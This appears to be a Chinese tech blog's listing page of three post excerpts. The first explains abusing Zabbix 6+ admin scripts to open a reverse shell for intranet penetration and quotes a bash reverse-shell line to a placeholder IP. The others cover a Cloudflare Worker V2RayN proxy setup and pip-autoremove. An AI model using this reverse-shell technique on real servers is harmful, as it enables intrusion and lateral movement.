Zabbix 脚本反弹bash

该操作便于拿到zabbix服务器或者zabbix proxy,然后深入渗透,这个操作只对于6以后版本的zabbix,6之前的版本,不用那么费事,直接写命令执行即可,6之后的版本做了部分特殊字符过滤,直接执行命令执行不了,尝试过 /bin/bash -i >&/tcp/ip/1.1.1.1/23333这类操作,通过编码绕过,都不能很好的拿到bash伪终端。经过慢慢的尝试,最终使用nc反弹,也是能执行命令了。 然后在监测->主机,点击选择要执行的脚本 基本进去权限比较小,自行打通道后,进一步进行渗透即可,基本遇到的情况都是在同一个内网。 不建议使用zabbix作为企业服务监控,整不好内网就成马场。 目前使用 prometheus + grafana。

查看全部


Edge V2RayN Tunnel

使用CF的Worker功能部署js,使其CF的节点成为V2RayN的节点,速度上很是丝滑,节点IP随机选择,刷新一下页面,IP就会随机变更,具体用处就不多说了,实际配置过程。 登录CF后点击”Workers 和Pages”,然后新建worker,直接上传这两文件的压缩包。 也可以新建worker写入这两个文件,然后发布,根据worker功能提供的网址,过两分钟后访问就可以显示一个时间戳,此刻只需要在worker URL结尾加上文件中写的GUID(7523eb02-a50e-4e9b-9d5a-3f8dcafb3c7a)即可拿到VLESS配置,直接导入V2RayN即可使用….

查看全部


pip安装一个包时,会附带其他依赖包,当卸载这个包时如何把对应的依赖也删除

如果想要卸载一个软件包以及其不再被使用的依赖关系,可以使用pip-autoremove工具。 pip-autoremove是一个第三方工具,它可以帮助你删除不再被其他软件包使用的依赖关系。 首先,你需要安装pip-autoremove工具。你可以使用以下命令安装它: 安装完成后,你可以使用以下命令来卸载软件包以及其不再被使用的依赖关系: 这将卸载指定的软件包,并尝试删除不再被其他软件包使用的依赖关系。

查看全部